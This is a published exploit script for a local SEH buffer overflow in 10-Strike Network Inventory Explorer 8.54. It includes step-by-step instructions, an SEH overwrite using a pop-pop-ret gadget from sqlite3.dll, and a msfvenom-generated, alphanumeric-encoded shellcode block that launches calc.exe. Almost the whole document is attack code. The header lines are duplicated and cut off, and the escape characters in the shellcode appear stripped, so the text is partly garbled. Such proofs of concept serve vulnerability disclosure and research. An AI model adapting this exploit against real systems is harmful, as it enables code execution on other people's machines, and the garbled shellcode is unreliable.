10-Strike Network Inventory Explorer 8.54 Buffer Overflow

# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)
# Date: 2020-03-24
# Author: Felipe Winsnes
# Vendor Homepage: https://www.10-stri # Exploit Title: 10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)
# Date: 2020-03-24
# Author: Felipe Winsnes
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Version: 8.54
# Tested on: Windows 7

# Proof of Concept:
# 1.- Run the python script "poc.py", it will create a new file "poc.txt"
# 2.- Copy the content of the new file 'poc.txt' to clipboard
# 3.- Open the Application
# 4.- Go to 'Main' or 'Computers'
# 5.- Click upon 'Add'
# 6.- Paste clipboard on 'Computer' parameter, under the title "Computer Card"
# 7.- Click "OK"
# 8.- Profit

# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Strike-Network-Inventory-Explorer-Structered-Exception-Handling-Overwrite/

import struct

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed
# Payload size: 448 bytes

buf = b""
buf += b"x89xe2xdaxc3xd9x72xf4x5fx57x59x49x49x49"
buf += b"x49x49x49x49x49x49x49x43x43x43x43x43x43"
buf += b"x37x51x5ax6ax41x58x50x30x41x30x41x6bx41"
buf += b"x41x51x32x41x42x32x42x42x30x42x42x41x42"
buf += b"x58x50x38x41x42x75x4ax49x39x6cx78x68x4f"
buf += b"x72x47x70x63x30x57x70x63x50x4dx59x4bx55"
buf += b"x55x61x49x50x45x34x6cx4bx50x50x36x50x4c"
buf += b"x4bx53x62x56x6cx4ex6bx33x62x44x54x4ex6b"
buf += b"x42x52x54x68x74x4fx68x37x50x4ax56x46x44"
buf += b"x71x49x6fx6ex4cx45x6cx63x51x53x4cx53x32"
buf += b"x76x4cx61x30x5ax61x58x4fx74x4dx76x61x49"
buf += b"x57x59x72x5ax52x46x32x56x37x6cx4bx30x52"
buf += b"x36x70x6cx4bx73x7ax57x4cx4cx4bx30x4cx64"
buf += b"x51x70x78x7ax43x33x78x75x51x68x51x70x51"
buf += b"x4cx4bx76x39x55x70x67x71x38x53x4ex6bx31"
buf += b"x59x66x78x38x63x45x6ax51x59x6cx4bx70x34"
buf += b"x4cx4bx57x71x59x46x45x61x59x6fx6ex4cx4b"
buf += b"x71x58x4fx66x6dx76x61x5ax67x56x58x6bx50"
buf += b"x73x45x49x66x75x53x71x6dx4cx38x37x4bx43"
buf += b"x4dx67x54x63x45x4bx54x52x78x6cx4bx73x68"
buf += b"x37x54x56x61x69x43x73x56x4cx4bx76x6cx32"
buf += b"x6bx6ex6bx61x48x65x4cx55x51x7ax73x6cx4b"
buf += b"x54x44x4ex6bx43x31x6ax70x4bx39x32x64x35"
buf += b"x74x55x74x63x6bx43x6bx75x31x72x79x73x6a"
buf += b"x56x31x59x6fx4bx50x53x6fx51x4fx43x6ax4c"
buf += b"x4bx62x32x6ax4bx4cx4dx43x6dx63x5ax76x61"
buf += b"x6ex6dx6dx55x4ex52x53x30x77x70x55x50x76"
buf += b"x30x32x48x70x31x6cx4bx50x6fx6fx77x69x6f"
buf += b"x58x55x4dx6bx4ax50x58x35x4ex42x42x76x75"
buf += b"x38x6fx56x6fx65x4dx6dx6dx4dx59x6fx39x45"
buf += b"x77x4cx76x66x73x4cx76x6ax4dx50x79x6bx4d"
buf += b"x30x70x75x37x75x6fx4bx53x77x67x63x73x42"
buf += b"x72x4fx50x6ax55x50x56x33x39x6fx39x45x45"
buf += b"x33x30x61x50x6cx70x63x34x6ex42x45x51x68"
buf += b"x31x75x65x50x41x41"

nseh = struct.pack("<I", 0x909006EB)
seh = struct.pack("<I", 0x61E8497A) # 0x61e8497a : pop esi # pop edi # ret | {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.12.2 (C:Program Files10-Strike Network Inventory Explorersqlite3.dll)

buffer = "A" * 211 + nseh + seh + "A" * 20 + buf + "xff" * 200
f = open ("poc.txt", "w")
f.write(buffer)
f.close()